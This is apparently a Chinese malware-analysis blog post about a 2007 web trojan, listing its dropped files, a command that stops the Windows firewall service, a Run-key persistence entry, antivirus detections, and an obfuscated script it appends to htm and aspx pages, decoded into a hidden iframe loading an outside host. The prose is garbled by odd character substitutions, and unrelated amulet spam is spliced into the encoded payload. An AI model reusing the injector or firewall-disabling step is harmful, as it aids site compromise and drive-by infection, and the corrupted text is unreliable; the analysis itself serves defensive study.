重庆高校在线开放课程平台

在FF看到这音尘.. 于是就把网页解开了.. 原本是"老一又友"刺客集团 .. 还是屡次和这个集团生成的网马打交说念了.. 其中挂上一个木马 hxxp://www.xxxx.com/pic/ddb/2006692151148920.gif 就此作念个分析吧.. 启动样本. 开释文献 C:\win30.exe 调用cmd 启动敕令 /c net stop sharedaccess 看望网站 61.129.102.79 地址应该是:hxxp://www.xxxx.com 80端口通信 下载:hxxp://www.xxxx.com/es86/db/dvbbs.mdb 此文献为rar 文献.. dvbbs.mdb 开释出文献为 C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eCompress.fne C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eImgConverter.fne C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eLIB.fne C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\HideProc.dll C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\internet.fne C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\krnln.fnr C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\mop C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\moz C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\Nhook.dll C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\shell.fne C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\svchost.exe 写入注册表 [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "svchost"="C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\svchost.exe" 在 htm 和 aspx 尾部加入代码 <script> p="60，105✨白蛇 白虎 虎 龍 福 /24k 御守り お守り，102，114，97，109✨白蛇 白虎 虎 龍 福 /24k 御守り お守り，101，32，104，101，105，103，104，116，61，48，32，119，105，100，116，104，61，48，32，115，114，99，61，34，104，116，116，112，58，47，47，97，45，108，46，109，101，105，98，117，46，99，111，109，47，34，62，60，47，105，102，114，97，109，101，62" p=eval("String.fromCharCode("+p+")"); document.write(p);</script> 解密为 <script> p="<iframe height=0 width=0 src="-l.meibu.com/"></iframe>" p=eval("String.fromCharCode("+p+")"); document.write(p);</script> 在线扫描 AntiVir 7.3.1.38 03.02.2007 TR/Crypt.NSPM.Gen  BitDefender 7.2 03.02.2007 DeepScan:Generic.Malware.PWYddldPk.D212BB22  eSafe 7.0.14.0 02.28.2007 suspicious Trojan/Worm  F-Secure 6.70.13030.0 03.02.2007 W32/Downloader  Ikarus T3.1.1.3 03.02.2007 Backdoor.Win32.Hupigon.BV  NOD32v2 2090 03.02.2007 a variant of Win32/Delf.AG  Norman 5.80.02 03.02.2007 W32/Downloader  Panda 9.0.0.4 03.01.2007 Suspicious file  以上分析齐在编造机里完成的.. 此次加的壳确实脱不开..无法检验更留神.. 不外意料 编写说话为 Borland Delphi 6.0 - 7.0 尝试关闭一些安全软件 推测也有.. =.= 再此吟唱..这什么破壳..